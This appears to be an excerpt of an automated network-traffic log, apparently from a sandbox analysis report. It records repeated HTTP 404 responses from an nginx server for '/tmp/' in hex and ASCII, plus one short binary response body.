HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:21:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
